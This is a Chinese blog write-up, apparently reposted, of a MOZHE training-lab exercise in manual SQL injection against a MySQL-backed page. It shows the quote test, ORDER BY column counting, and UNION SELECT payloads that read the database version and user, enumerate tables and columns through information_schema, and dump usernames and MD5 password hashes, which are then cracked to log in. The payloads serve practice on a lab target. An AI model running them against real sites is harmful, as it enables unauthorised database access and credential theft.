您的位置:首页 > 健康 > 美食 > MOZHE SQL手工注入漏洞测试(MySQL数据库)

MOZHE SQL手工注入漏洞测试(MySQL数据库)

2024/10/6 22:22:54 来源:https://blog.csdn.net/2202_75354817/article/details/140681021  浏览:    关键词:MOZHE SQL手工注入漏洞测试(MySQL数据库)

主界面URL没有参数,无法判断是否有注入点

点击公告

【浏览器不便于查看返回包可以用burp】

测试URL 

参数后加上单引号,报错,说明存在注入点
http://124.70.64.48:40021/new_list.php?id=1'

获取表列数

order by 4  返回200
order by 5  返回500
id 所在表有4列

爆显位

让id=-1,使前半段查询出错,让后半段查询结果显示出来
填充数字个数等于列刚才得到的列数
http://124.70.64.48:40021/new_list.php?id=-1%20union%20select%201,2,3,4

获取信息

在显位上查询以下信息:
version()                数据库版本5.7.22-0ubuntu0.16.04.1
user()                   用户root@localhost
@@version_compile_os     操作系统Linux
database()               数据库名字mozhe_Discuz_StormGroup

知道数据库名字,到information_schema里查数据库中的表

group_concat() 将结果连接起来,避免显示不完整
information_schema.tables记录了所有表的信息
information_schema.tables的table_schema列记录了表对应的数据库
information_schema.tables的table_name列记录了表名union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'该数据库有两个表StormGroup_member,notice

知道表名查列名

group_concat() 将结果连接起来,避免显示不完整
information_schema.columns记录了所有列的信息
information_schema.columns的table_name列记录了列对应的表
information_schema.columns的column_name列记录了列名union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'该数据库有列:id,name,password,status

知道列名查字段

union select 1,group_concat(name),group_concat(password),4 from mozhe_Discuz_StormGroup.StormGroup_membername:mozhe,mozhe
password:356f589a7df439f6f744ff19bb8092c0,ae0af42ea5d582a11a9c994a96a2002e

密码为MD5加密,md5在线解密

第二个密码209883正确。(查看status列就知道,第一个账号status为0,登录不了)

成功登录,获取key

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com